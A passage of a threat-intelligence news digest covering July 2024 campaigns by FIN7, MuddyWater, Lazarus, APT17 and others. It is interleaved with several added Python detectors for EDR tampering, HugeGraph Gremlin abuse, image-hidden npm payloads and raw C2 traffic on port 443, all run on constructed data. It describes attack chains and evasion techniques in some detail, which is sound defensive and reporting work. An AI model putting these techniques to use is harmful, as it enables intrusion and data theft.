"If I had to guess, the DPRK hackers likely approached their potential victims, requesting that they join a hiring meeting, by downloading and executing the (infected version of) MiroTalk hosted on mirotalk[.]net," Wardle said.
An analysis of the unsigned DMG file reveals that it facilitates the theft of data from cryptocurrency wallets, iCloud Keychain, and web browsers like Google Chrome, Brave, and Opera. Furthermore, it's designed to download and execute additional Python scripts from a remote server (i.e., InvisibleFerret).
"The North Korean hackers are a wily bunch and are quite adept at hacking macOS targets, even though their techniques often rely on social engineering (and thus from a technical point of view are rather unimpressive)," Wardle said.
The disclosure comes as Phylum uncovered a new malicious npm package named call-blockflow that's virtually identical to the legitimate call-bind library but incorporates complex functionality to download a remote binary file while taking painstaking efforts to fly under the radar.
"In this attack, while the call-bind package has not been compromised, the weaponized call-blockflow package copies all the trust and legitimacy of the original to bolster the attack's success," it said in a statement shared with The Hacker News.
The package, suspected to be the work of the North Korea-linked Lazarus Group and unpublished about an hour and a half after it was uploaded to npm, attracted a total of 18 downloads. Evidence suggests that the activity, comprising over three dozen malicious packages, has been underway in waves since September 2023.
"These packages, once installed, would download a remote file, decrypt it, execute an exported function from it, and then meticulously cover their tracks by deleting and renaming files," the software supply chain security company said. "This left the package directory in a seemingly benign state after installation."
It also follows an advisory from JPCERT/CC, warning of cyber attacks orchestrated by the North Korean Kimsuky actor targeting Japanese organizations.
The infection process starts with phishing messages impersonating security and diplomatic organizations that contain a malicious executable. Opening it leads to the download of a Visual Basic Script (VBS), which in turn retrieves a PowerShell script to harvest user account, system, and network information as well as enumerate files and processes.
The collected information is then exfiltrated to a command-and-control (C2) server, which responds back with a second VBS file that's then executed to fetch and run a PowerShell-based keylogger named InfoKey.
"Although there have been few reports of attack activities by Kimsuky targeting organizations in Japan, there is a possibility that Japan is also being actively targeted," JPCERT/CC said.
FIN7 Group Advertises Security-Bypassing Tool on Dark Web Forums
17.7.24
APT
The Hacker News
The financially motivated threat actor known as FIN7 has been observed using
multiple pseudonyms across several underground forums to likely advertise a tool
known to be used by ransomware groups like Black Basta.
"AvNeutralizer (aka AuKill), a highly specialized tool developed by FIN7 to tamper with security solutions, has been marketed in the criminal underground and used by multiple ransomware groups," cybersecurity company SentinelOne said in a report shared with The Hacker News.
FIN7, an e-crime group of Russian and Ukrainian origin, has been a persistent threat since at least 2012, shifting gears from its initial targeting of point-of-sale (PoS) terminals to acting as a ransomware affiliate for now-defunct gangs such as REvil and Conti, before launching its own ransomware-as-a-service (RaaS) programs DarkSide and BlackMatter.
The threat actor, which is also tracked under the names Carbanak, Carbon Spider, Gold Niagara, and Sangria Tempest (formerly Elbrus), has a track record of setting up front companies like Combi Security and Bastion Secure to recruit unwitting software engineers into ransomware schemes under the pretext of penetration testing.
Over the years, FIN7 has demonstrated a high level of adaptability, sophistication, and technical expertise by retooling its malware arsenal – POWERTRASH, DICELOADER (aka IceBot, Lizar, or Tirion), and a penetration testing tool called Core Impact that's delivered via the POWERTRASH loader – notwithstanding the arrests and sentencing of some of its members.
This is evidenced in the large-scale phishing campaigns undertaken by the group to deliver ransomware and other malware families by deploying thousands of "shell" domains that mimic legitimate media and technology businesses, according to a recent report from Silent Push.
Alternately, these shell domains have been occasionally used in a conventional redirect chain to send users to spoofed login pages that masquerade as property management portals.
Some of these shell domains typosquat legitimate software download sites and are advertised on search engines like Google, tricking users searching for popular software into downloading a malware-laced variant instead. Some of the tools targeted include 7-Zip, PuTTY, AIMP, Notepad++, Advanced IP Scanner, AnyDesk, pgAdmin, AutoDesk, Bitwarden, Rest Proxy, Python, Sublime Text, and Node.js.
It's worth noting that FIN7's use of malvertising tactics was previously highlighted by both eSentire and Malwarebytes in May 2024, with the attack chains leading to the deployment of NetSupport RAT.
"FIN7 rents a large amount of dedicated IPs on a number of hosts, but primarily on Stark Industries, a popular bulletproof hosting provider that has been linked to DDoS attacks in Ukraine and across Europe," Silent Push noted.
The latest findings from SentinelOne show that FIN7 has not only used several personas on cybercrime forums to promote the sale of AvNeutralizer, but has also improvised the tool with new capabilities.
This is based on the fact that, as of January 2023, multiple ransomware groups began using updated versions of the EDR impairment tool, which until then had been used exclusively by the Black Basta group.
SentinelLabs researcher Antonio Cocomazzi told The Hacker News that the advertisement of AvNeutralizer on underground forums shouldn't be treated as a new malware-as-a-service (MaaS) tactic adopted by FIN7 without additional evidence.
"FIN7 has a history of developing and using sophisticated tools for their own operations," Cocomazzi said. "However, selling tools to other cybercriminals could be seen as a natural evolution of their methods to diversify and generate additional revenue."
"Historically, FIN7 has used underground marketplaces to generate revenue. For example, the DoJ reported that since 2015, FIN7 successfully stole data for more than 16 million payment cards, many of which were sold on underground marketplaces. While this was more common in the pre-ransomware era, the current advertisement of AvNeutralizer could signal a shift or expansion in their strategy."
"This could be motivated by the increasing protections provided by today's EDR solutions compared to previous AV systems. As these defenses have improved, the demand for impairment tools like AvNeutralizer has grown significantly, especially among ransomware operators. Attackers now face tougher challenges in bypassing these protections, making such tools highly valuable and expensive."
For its part, the updated version of AvNeutralizer employs anti-analysis techniques and, most importantly, leverages a Windows built-in driver called "ProcLaunchMon.sys" in conjunction with the Process Explorer driver to tamper with the functioning of security solutions and evade detection. The tool is believed to have been in active development since April 2022.
A similar version of this approach has also been put to use by the Lazarus Group, making it even more dangerous as it goes beyond a traditional Bring Your Own Vulnerable Driver (BYOVD) attack by weaponizing a susceptible driver already present by default in Windows machines.
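The driver pairing described above is something a detection engineer can look for directly in endpoint telemetry. The script below is an added example (not from the article or SentinelOne): it reads Sysmon Event ID 6 (DriverLoad) records serialized as JSON lines and flags any host that loads ProcLaunchMon.sys, the built-in driver named in the report, together with the Process Explorer driver. The Process Explorer driver file name (PROCEXP152.sys), the JSON field layout and the event lines themselves are assumptions constructed for the demo.

```python
"""Correlate driver-load telemetry for the AvNeutralizer pattern.

Added example, not from the article or SentinelOne. Walks Sysmon Event ID 6
(DriverLoad) records as JSON lines and flags hosts that load ProcLaunchMon.sys
together with the Process Explorer driver. The Process Explorer driver file
name (PROCEXP152.sys) and the field layout are assumptions; events are
constructed.
"""
import json
from datetime import datetime, timedelta
from typing import Dict, List

# Both drivers loaded on one host inside this window is the strong signal.
PAIR_WINDOW = timedelta(minutes=15)


def driver_file(image_loaded: str) -> str:
    """Return the lower-cased file name from a Windows image path."""
    return image_loaded.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(file_name: str):
    """Map a driver file name to the family we care about, else None."""
    if file_name == "proclaunchmon.sys":
        return "proclaunchmon"
    if file_name.startswith("procexp"):   # assumption: PROCEXP152.sys and friends
        return "procexp"
    return None


def correlate(event_lines: List[str]) -> List[Dict[str, object]]:
    """One finding per host that loaded either driver.

    'high'   : both drivers loaded within PAIR_WINDOW of each other
    'medium' : only one of them; an admin running Process Explorer looks the
               same, so this needs analyst review rather than auto-block
    """
    per_host: Dict[str, list] = {}
    for raw in event_lines:
        ev = json.loads(raw)
        if ev.get("EventID") != 6:
            continue
        family = classify(driver_file(ev["ImageLoaded"]))
        if family is None:
            continue
        ts = datetime.fromisoformat(ev["UtcTime"])
        per_host.setdefault(ev["Computer"], []).append((ts, family))

    findings = []
    for host, loads in sorted(per_host.items()):
        paired = any(
            a[1] != b[1] and abs(a[0] - b[0]) <= PAIR_WINDOW
            for a in loads for b in loads
        )
        findings.append({
            "host": host,
            "severity": "high" if paired else "medium",
            "drivers": sorted({family for _, family in loads}),
        })
    return findings


# Constructed Sysmon-style events: WS01 shows the full pattern, WS02 only a
# Process Explorer driver load, WS03 an unrelated image load (Event ID 7).
SAMPLE_EVENTS = [
    json.dumps({"EventID": 6, "Computer": "WS01", "UtcTime": "2024-07-17 09:00:12",
                "ImageLoaded": "C:\\Windows\\Temp\\PROCEXP152.sys"}),
    json.dumps({"EventID": 6, "Computer": "WS01", "UtcTime": "2024-07-17 09:03:40",
                "ImageLoaded": "C:\\Windows\\System32\\drivers\\ProcLaunchMon.sys"}),
    json.dumps({"EventID": 6, "Computer": "WS02", "UtcTime": "2024-07-17 11:20:00",
                "ImageLoaded": "C:\\Tools\\PROCEXP152.sys"}),
    json.dumps({"EventID": 7, "Computer": "WS03", "UtcTime": "2024-07-17 11:25:00",
                "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll"}),
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

Because ProcLaunchMon.sys ships with Windows, a signature-based or BYOVD blocklist approach does not help here; the load of that driver on a host that has no debugger tooling installed is the thing to alert on, and the pairing with the Process Explorer driver raises confidence.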
Another noteworthy update concerns FIN7's Checkmarks platform, which has been modified to include an automated SQL injection attack module for exploiting public-facing applications.
"In its campaigns, FIN7 has adopted automated attack methods, targeting public-facing servers through automated SQL injection attacks," SentinelOne said. "Additionally, its development and commercialization of specialized tools like AvNeutralizer within criminal underground forums significantly enhance the group's impact."
China-linked APT17 Targets Italian Companies with 9002 RAT Malware
17.7.24
APT
The Hacker News
A China-linked threat actor called APT17 has been observed targeting Italian
companies and government entities using a variant of a known malware referred to
as 9002 RAT.
The two targeted attacks took place on June 24 and July 2, 2024, Italian cybersecurity company TG Soft said in an analysis published last week.
"The first campaign on June 24, 2024 used an Office document, while the second campaign contained a link," the company noted. "Both campaigns invited the victim to install a Skype for Business package from a link of an Italian government-like domain to convey a variant of 9002 RAT."
APT17 was first documented by Google-owned Mandiant (then FireEye) in 2013 as part of cyber espionage operations called DeputyDog and Ephemeral Hydra that leveraged zero-day flaws in Microsoft's Internet Explorer to breach targets of interest.
It's also known by the monikers Aurora Panda, Bronze Keystone, Dogfish, Elderwood, Helium, Hidden Lynx, and TEMP.Avengers, with the adversary sharing some level of tooling overlap with another threat actor dubbed Webworm.
9002 RAT, aka Hydraq and McRAT, achieved notoriety as the cyber weapon of choice in Operation Aurora that singled out Google and other large companies in 2009. It was also subsequently put to use in another 2013 campaign named Sunshop in which the attackers injected malicious redirects into several websites.
The latest attack chains entail the use of spear-phishing lures to trick recipients into clicking on a link that urges them to download an MSI installer for Skype for Business ("SkypeMeeting.msi").
Launching the MSI package triggers the execution of a Java archive (JAR) file via a Visual Basic Script (VBS), while also installing the legitimate chat software on the Windows system. The Java application, in turn, decrypts and executes the shellcode responsible for launching 9002 RAT.
A modular trojan, 9002 RAT comes with features to monitor network traffic, capture screenshots, enumerate files, manage processes, and run additional commands received from a remote server to facilitate network discovery, among others.
"The malware appears to be constantly updated with diskless variants as well," TG Soft said. "It is composed of various modules that are activated as needed by the cyber actor so as to reduce the possibility of interception."
Scattered Spider Adopts RansomHub
and Qilin Ransomware for Cyber Attacks
17.7.24
Ransom
The Hacker News
The infamous cybercrime group known as Scattered Spider has incorporated
ransomware strains such as RansomHub and Qilin into its arsenal, Microsoft has
revealed.
Scattered Spider is the designation given to a threat actor that's known for its sophisticated social engineering schemes to breach targets and establish persistence for follow-on exploitation and data theft. It also has a history of targeting VMware ESXi servers and deploying BlackCat ransomware.
It shares overlaps with activity clusters tracked by the broader cybersecurity community under the monikers 0ktapus, Octo Tempest, and UNC3944. Last month, it was reported that a key member of the group was arrested in Spain.
RansomHub, which arrived on the scene earlier this February, has been assessed to be a rebrand of another ransomware strain called Knight, according to an analysis from Broadcom-owned Symantec last month.
"RansomHub is a ransomware-as-a-service (RaaS) payload used by more and more threat actors, including ones that have historically used other (sometimes defunct) ransomware payloads (like BlackCat), making it one of the most widespread ransomware families today," Microsoft said.
The Windows maker said it also observed RansomHub being deployed as part of post-compromise activity by Manatee Tempest (aka DEV-0243, Evil Corp, or Indrik Spider) following initial access obtained by Mustard Tempest (aka DEV-0206 or Purple Vallhund) through FakeUpdates (aka Socgholish) infections.
It's worth mentioning here that Mustard Tempest is an initial access broker that has, in the past, utilized FakeUpdates in attacks that have led to actions resembling pre-ransomware behavior associated with Evil Corp. These intrusions were also notable for the fact that FakeUpdates was delivered via existing Raspberry Robin infections.
The development comes amid the emergence of fresh ransomware families like FakePenny (attributed to Moonstone Sleet), Fog (distributed by Storm-0844, which has also propagated Akira), and ShadowRoot, the last of which has been observed targeting Turkish businesses using fake PDF invoices.
"As the threat of ransomware continues to increase, expand, and evolve, users and organizations are advised to follow security best practices, especially credential hygiene, principle of least privilege, and Zero Trust," Microsoft said.
Critical Apache HugeGraph
Vulnerability Under Attack - Patch ASAP
17.7.24
Vulnerability
The Hacker News
Threat actors are actively exploiting a recently disclosed critical security
flaw impacting Apache HugeGraph-Server that could lead to remote code execution
attacks.
Tracked as CVE-2024-27348 (CVSS score: 9.8), the vulnerability impacts all versions of the software before 1.3.0. It has been described as a remote command execution flaw in the Gremlin graph traversal language API.
"Users are recommended to upgrade to version 1.3.0 with Java 11 and enable the Auth system, which fixes the issue," the Apache Software Foundation noted in late April 2024. "Also you could enable the 'Whitelist-IP/port' function to improve the security of RESTful-API execution."
Additional technical specifics about the flaw were released by penetration testing company SecureLayer7 in early June, stating it enables an attacker to bypass sandbox restrictions and achieve code execution, giving them complete control over a susceptible server.
This week, the Shadowserver Foundation said it spotted in-the-wild exploitation attempts that leverage the flaw, making it imperative that users move quickly to apply the latest fixes.
"We are observing Apache HugeGraph-Server CVE-2024-27348 RCE 'POST /gremlin' exploitation attempts from multiple sources," it said. "[Proof-of-concept] code is public since early June. If you run HugeGraph, make sure to update."
Vulnerabilities discovered in Apache projects have been lucrative attack vectors for the nation-state and financially motivated threat actors in recent years, with flaws in Log4j, ActiveMQ, and RocketMQ coming under heavy exploitation to infiltrate target environments.
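The advisory's two mitigations (an IP allowlist in front of the RESTful API and the Auth system) also give a defender something concrete to check in access logs while patching is under way. The script below is an added example, not from the article, Shadowserver or the HugeGraph project: it triages web server access logs for the `POST /gremlin` requests Shadowserver reported and flags any that come from outside an allowlist or that succeed without an authenticated user. The log layout (combined format with an authenticated-user field), the allowlist networks and the sample lines are constructed for the demo.

```python
"""Triage an access log for Apache HugeGraph Gremlin API abuse.

Added example, not from the article, Shadowserver or the HugeGraph project.
Encodes the two mitigations the advisory names: restrict which sources may
reach the RESTful API (an IP allowlist) and require authentication. The log
layout, the allowlist and the sample lines are constructed for the demo.
"""
import ipaddress
import re
from typing import Dict, List, Optional

# Combined log format with an authenticated-user field (assumed layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Networks that are allowed to call the API (assumption for the demo).
ALLOWED_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                ipaddress.ip_network("192.168.1.0/24")]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def source_allowed(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ALLOWED_NETS)


def triage(lines: List[str]) -> List[Dict[str, str]]:
    """One finding per POST /gremlin that breaks either mitigation."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] != "POST" or path != "/gremlin":
            continue
        reasons = []
        if not source_allowed(rec["ip"]):
            reasons.append("source outside API allowlist")
        if rec["user"] == "-" and rec["status"].startswith("2"):
            reasons.append("unauthenticated request succeeded (Auth system off?)")
        if reasons:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "reason": "; ".join(reasons)})
    return findings


# Constructed sample: one clean authenticated call, one external unauthenticated
# call, an unrelated GET, a rejected call, and an internal unauthenticated call.
SAMPLE_LOG = [
    '10.0.5.7 - analyst [17/Jul/2024:10:01:02 +0000] "POST /gremlin HTTP/1.1" 200 512',
    '203.0.113.9 - - [17/Jul/2024:10:05:44 +0000] "POST /gremlin HTTP/1.1" 200 1024',
    '198.51.100.3 - - [17/Jul/2024:10:06:10 +0000] "GET /graphs HTTP/1.1" 200 88',
    '10.0.5.7 - - [17/Jul/2024:10:07:00 +0000] "POST /gremlin HTTP/1.1" 401 0',
    '192.168.1.20 - - [17/Jul/2024:10:08:31 +0000] "POST /gremlin?lang=x HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

A 2xx response to an unauthenticated `POST /gremlin` from an internal address is the more important of the two signals: it means the Auth system is off, so the allowlist is the only thing standing between any reachable client and command execution.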
'Konfety' Ad Fraud Uses 250+ Google Play Decoy Apps to Hide Malicious Twins
16.7.24
Virus
The Hacker News
Details have emerged about a "massive ad fraud operation" that leverages hundreds of apps on the Google Play Store to perform a host of nefarious activities.
The campaign has been codenamed Konfety – the Russian word for Candy – owing to its abuse of a mobile advertising software development kit (SDK) associated with a Russia-based ad network called CaramelAds.
"Konfety represents a new form of fraud and obfuscation, in which threat actors operate 'evil twin' versions of 'decoy twin' apps available on major marketplaces," HUMAN's Satori Threat Intelligence Team said in a technical report shared with The Hacker News.
While the decoy apps, totaling more than 250 in number, are harmless and distributed via the Google Play Store, their respective "evil twins" are disseminated through a malvertising campaign designed to facilitate ad fraud, monitor web searches, install browser extensions, and sideload APK files onto users' devices.
The most unusual aspect of the campaign is that the evil twin masquerades as the decoy twin by spoofing the latter's app ID and advertising publisher IDs for rendering ads. Both the decoy and evil twin sets of apps operate on the same infrastructure, allowing the threat actors to exponentially scale their operations as required.
That said, not only do the decoy apps behave normally, but a majority of them do not even render ads. They also incorporate a GDPR consent notice.
"This 'decoy/evil twin' mechanism for obfuscation is a novel way for threat actors to represent fraudulent traffic as legitimate," HUMAN researchers said. "At its peak, Konfety-related programmatic volume reached 10 billion requests per day."
Put differently, Konfety takes advantage of the SDK's ad rendering capabilities to commit ad fraud by making it a lot more challenging to distinguish malicious traffic from legitimate traffic.
The Konfety evil twin apps are said to be propagated via a
malvertising campaign promoting APK mods and other software like Letasoft Sound
Booster, with the booby-trapped URLs hosted on attacker-controlled domains,
compromised WordPress sites, and other platforms that allow content uploads,
including Docker Hub, Facebook, Google Sites, and OpenSea.
Users who end up clicking on these URLs are redirected to a domain that tricks
them into downloading the malicious evil twin app, which, in turn, acts as a
dropper for a first-stage that's decrypted from the assets of the APK file and
is used to set up command-and-control (C2) communications.
The initial stager further attempts to hide the app's icon from the device's home screen and runs a second-stage DEX payload that performs fraud by serving out-of-context, full-screen video ads when the user is either on their home screen or using another app.
"The crux of the Konfety operation lies in the evil twin apps," the researchers said. "These apps mimic their corresponding decoy twin apps by copying their app ID/package names and publisher IDs from the decoy twin apps."
"The network traffic derived from the evil twin applications is functionally identical to network traffic derived from the decoy twin applications; the ad impressions rendered by the evil twins use the package name of the decoy twins in the request."
Other capabilities of the malware include weaponizing the CaramelAds SDK to visit websites using the default web browser, luring users by sending notifications that prompt them into clicking on the bogus links, or sideloading modified versions of other advertising SDKs.
That's not all. Users installing the evil twin apps are urged to add a search toolbar widget to the device home screen, which surreptitiously monitors their searches by sending the data to domains named vptrackme[.]com and youaresearching[.]com.
"Threat actors understand that hosting malicious apps on stores is not a stable technique, and are finding creative and clever ways to evade detection and commit sustainable long term fraud," the researchers concluded. "Actors setting up mediation SDK companies and spreading the SDK to abuse high-quality publishers is a growing technique."
Malicious npm Packages Found Using
Image Files to Hide Backdoor Code
16.7.24
Virus
The Hacker News
Cybersecurity researchers have identified two malicious packages on the npm
package registry that concealed backdoor code to execute malicious commands sent
from a remote server.
The packages in question – img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy – have been downloaded 190 and 48 times, respectively. As of writing, they have been taken down by the npm security team.
"They contained sophisticated command and control functionality hidden in image files that would be executed during package installation," software supply chain security firm Phylum said in an analysis.
The packages are designed to impersonate a legitimate npm library called aws-s3-object-multipart-copy, but come with an altered version of the "index.js" file to execute a JavaScript file ("loadformat.js").
For its part, the JavaScript file is designed to process three images -- that feature the corporate logos for Intel, Microsoft, and AMD -- with the image corresponding to Microsoft's logo used to extract and execute the malicious content.
The code works by registering the new client with a command-and-control (C2) server by sending the hostname and operating system details. It then attempts to execute attacker-issued commands periodically every five seconds.
In the final stage, the output of the commands' execution is exfiltrated back to the attacker via a specific endpoint.
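Two things in that chain are cheap to check before a package is allowed into a build: whether it registers a lifecycle script that runs at install time, and whether its image assets are really just images. The script below is an added example, not from the article or Phylum's analysis. It walks the PNG chunk list and reports any bytes that follow the IEND chunk, one common place to stash a payload; the article does not say how these particular packages encoded theirs, so treat it as a generic check rather than a signature for this campaign. The package contents (name, scripts, logos) are constructed in memory so the demo runs offline.

```python
"""Spot install hooks and payloads appended to image assets in an npm package.

Added example, not from the article or Phylum. Checks package.json for
lifecycle scripts that run at install time and PNG files for bytes after
the IEND chunk. The article does not say how the real packages hid their
payload, so this is a generic check. Package contents are constructed.
"""
import json
import struct
import zlib
from typing import Dict, List, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def png_trailing_bytes(data: bytes) -> int:
    """Walk the chunk list and return how many bytes follow IEND.

    Raises ValueError for anything that is not a well-formed PNG up to IEND,
    which is itself worth a look when the file is supposed to be a logo.
    """
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    off = len(PNG_SIG)
    while off + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[off:off + 8])
        body = data[off + 8:off + 8 + length]
        crc = data[off + 8 + length:off + 12 + length]
        if len(body) != length or len(crc) != 4:
            raise ValueError("truncated chunk")
        if struct.unpack(">I", crc)[0] != (zlib.crc32(tag + body) & 0xFFFFFFFF):
            raise ValueError(f"bad CRC on {tag!r}")
        off += 12 + length
        if tag == b"IEND":
            return len(data) - off
    raise ValueError("no IEND chunk")


def scan_package(files: Dict[str, bytes]) -> List[Tuple[str, str]]:
    """Return (path, reason) findings for a package given as {path: bytes}."""
    findings = []
    pkg = json.loads(files.get("package.json", b"{}"))
    for hook, cmd in pkg.get("scripts", {}).items():
        if hook in INSTALL_HOOKS:
            findings.append(("package.json", f"{hook} hook runs: {cmd}"))
    for path, blob in files.items():
        if not path.lower().endswith(".png"):
            continue
        try:
            extra = png_trailing_bytes(blob)
        except ValueError as err:
            findings.append((path, f"malformed PNG: {err}"))
            continue
        if extra:
            findings.append((path, f"{extra} bytes after IEND"))
    return findings


def _chunk(tag: bytes, body: bytes) -> bytes:
    return (struct.pack(">I", len(body)) + tag + body
            + struct.pack(">I", zlib.crc32(tag + body) & 0xFFFFFFFF))


# A minimal 1x1 8-bit greyscale PNG, built here so the demo runs offline.
CLEAN_PNG = (PNG_SIG
             + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
             + _chunk(b"IDAT", zlib.compress(b"\x00\x00"))
             + _chunk(b"IEND", b""))
PAYLOAD = b"// constructed stand-in for hidden script bytes\n"
STEGO_PNG = CLEAN_PNG + PAYLOAD

# Constructed package with the shape described above: an install-time script
# plus three vendor logos, one of which carries extra bytes.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({"name": "example-pkg",
                                "scripts": {"postinstall": "node loadformat.js"}}).encode(),
    "index.js": b"require('./loadformat.js');\n",
    "logos/intel.png": CLEAN_PNG,
    "logos/amd.png": CLEAN_PNG,
    "logos/microsoft.png": STEGO_PNG,
}

if __name__ == "__main__":
    for path, reason in scan_package(SAMPLE_PACKAGE):
        print(f"{path}: {reason}")
```

Trailing bytes alone are not proof of malice (image editors sometimes leave metadata after IEND), but an install hook plus a logo that is larger than its chunk list accounts for is exactly the combination to pull a package out of the pipeline for review.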
"In the last few years, we've seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems," Phylum said.
"Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume."
Iranian Hackers Deploy New BugSleep
Backdoor in Middle East Cyber Attacks
16.7.24
APT
The Hacker News
The Iranian nation-state actor known as MuddyWater has been observed using a
never-before-seen backdoor as part of a recent attack campaign, shifting away
from its well-known tactic of deploying legitimate remote monitoring and
management (RMM) software for maintaining persistent access.
That's according to independent findings from cybersecurity firms Check Point and Sekoia, which have codenamed the malware strain BugSleep and MuddyRot, respectively.
"Compared to previous campaigns, this time MuddyWater changed their infection chain and did not rely on the legitimate Atera remote monitoring and management tool (RMM) as a validator," Sekoia said in a report shared with The Hacker News. "Instead, we observed that they used a new and undocumented implant."
Some elements of the campaign were first shared by Israeli cybersecurity company ClearSky on June 9, 2024. Targets include countries like Turkey, Azerbaijan, Jordan, Saudi Arabia, Israel, and Portugal.
MuddyWater (aka Boggy Serpens, Mango Sandstorm, and TA450) is a state-sponsored threat actor that's assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS).
Cyber attacks mounted by the group have been fairly consistent, leveraging spear-phishing lures in email messages to deliver various RMM tools like Atera Agent, RemoteUtilities, ScreenConnect, SimpleHelp, and Syncro.
Earlier this April, HarfangLab said it noticed an uptick in MuddyWater campaigns delivering Atera Agent since late October 2023 to businesses across Israel, India, Algeria, Turkey, Italy, and Egypt. The sectors targeted include airlines, IT companies, telecoms, pharma, automotive manufacturing, logistics, travel, and tourism.
"MuddyWater places a high priority on gaining access to business email accounts as part of their ongoing attack campaigns," the French cybersecurity firm noted at the time.
"These compromised accounts serve as valuable resources, enabling the group to
enhance the credibility and effectiveness of their spear-phishing efforts,
establish persistence within targeted organizations, and evade detection by
blending in with legitimate network traffic."
The latest attack chains are no different in that compromised email accounts belonging to legitimate companies are used to send spear-phishing messages that either contain a direct link or a PDF attachment pointing to an Egnyte subdomain, which has been previously abused by the threat actor to propagate Atera Agent.
BugSleep, aka MuddyRot, is an x64 implant developed in C that comes equipped with capabilities to download/upload arbitrary files to/from the compromised host, launch a reverse shell, and set up persistence. Communications with a command-and-control (C2) server take place over a raw TCP socket on port 443.
"The first message to be sent to the C2 is the victim host fingerprint, which is the combination of the hostname and the username joined by a slash," Sekoia said. "If the victim receives '-1,' the program stops; otherwise the malware enters an infinite loop to await new orders from the C2."
It's currently not clear why MuddyWater has switched to using a bespoke implant, although it's suspected that the increased monitoring of RMM tools by security vendors may have played a part.
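A raw TCP socket on port 443 is the one network-side detail above that does not depend on any indicator going stale: whatever the implant sends, it is not a TLS ClientHello, which is what almost everything else on 443 starts with. The script below is an added example, not from the article, Check Point or Sekoia. It classifies flow records by whether the first client bytes on 443 form a TLS record header, and flags the rest for review. The flow-record layout and the flows are constructed. The `fingerprint_like` column assumes the hostname/username string travels unencoded, which the article does not state; treat it as a weak secondary hint, not a signature.

```python
"""Flag port-443 flows whose first client bytes are not TLS.

Added example, not from the article, Check Point or Sekoia. BugSleep uses a
raw TCP socket on 443, so the cheapest network-side check is whether the
first client payload on 443 is a TLS ClientHello. Flow layout and flows are
constructed; 'fingerprint_like' assumes an unencoded host/user string, which
the article does not confirm.
"""
import re
from typing import Dict, List, Tuple


def looks_like_tls_client_hello(payload: bytes) -> bool:
    """TLS record header: type 0x16 (handshake), version 0x03 0x0X, 2-byte
    length, then handshake type 0x01 (ClientHello)."""
    return (len(payload) >= 6
            and payload[0] == 0x16
            and payload[1] == 0x03
            and payload[2] <= 0x04
            and payload[5] == 0x01)


# Weak hint only: "<hostname>/<username>" as the article describes the
# fingerprint, if it were sent in the clear (assumption).
FINGERPRINT_RE = re.compile(rb"^[A-Za-z0-9._-]{1,63}/[A-Za-z0-9._ -]{1,64}$")


def fingerprint_like(payload: bytes) -> bool:
    return FINGERPRINT_RE.match(payload) is not None


Flow = Tuple[str, str, int, bytes]   # (src, dst, dst_port, first client bytes)


def triage_flows(flows: List[Flow]) -> List[Dict[str, object]]:
    """Return every 443 flow that does not open with a TLS ClientHello."""
    findings = []
    for src, dst, dport, payload in flows:
        if dport != 443 or looks_like_tls_client_hello(payload):
            continue
        findings.append({
            "src": src,
            "dst": dst,
            "preview": payload[:16],
            "fingerprint_like": fingerprint_like(payload),
        })
    return findings


# Constructed flows: a genuine ClientHello, a bare host/user string, plain
# HTTP on 443 (misconfigured, not necessarily malicious), and port-80 noise.
SAMPLE_FLOWS = [
    ("10.1.1.5", "203.0.113.20", 443,
     bytes([0x16, 0x03, 0x01, 0x00, 0xF4, 0x01, 0x00, 0x00, 0xF0])),
    ("10.1.1.6", "198.51.100.7", 443, b"WS-FIN-01/jdoe"),
    ("10.1.1.7", "203.0.113.21", 443, b"GET / HTTP/1.1\r\nHost: x\r\n\r\n"),
    ("10.1.1.8", "203.0.113.22", 80, b"GET / HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for finding in triage_flows(SAMPLE_FLOWS):
        print(finding)
```

Plain HTTP on 443 will show up too, so the list is a triage queue rather than an alert; the point is that the implant's choice of a well-known port buys it nothing once the sensor looks at the first bytes instead of the port number.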
"The increased activity of MuddyWater in the Middle East, particularly in Israel, highlights the persistent nature of these threat actors, who continue to operate against a wide variety of targets in the region," Check Point said.
"Their consistent use of phishing campaigns, now incorporating a custom backdoor, BugSleep, marks a notable development in their techniques, tactics, and procedures (TTPs)."
Void Banshee APT Exploits Microsoft
MHTML Flaw to Spread Atlantida Stealer
16.7.24
APT
The Hacker News
An advanced persistent threat (APT) group called Void Banshee has been observed
exploiting a recently disclosed security flaw in the Microsoft MHTML browser
engine as a zero-day to deliver an information stealer called Atlantida.
According to cybersecurity firm Trend Micro, which observed the activity in mid-May 2024, the vulnerability – tracked as CVE-2024-38112 – was used as part of a multi-stage attack chain using specially crafted internet shortcut (URL) files.
"Variations of the Atlantida campaign have been highly active throughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains," security researchers Peter Girnus and Aliakbar Zahravi said. "The ability of APT groups like Void Banshee to exploit disabled services such as [Internet Explorer] poses a significant threat to organizations worldwide."
The findings dovetail with prior disclosures from Check Point, which told The Hacker News of a campaign leveraging the same shortcoming to distribute the stealer. It's worth noting that CVE-2024-38112 was addressed by Microsoft as part of Patch Tuesday updates last week.
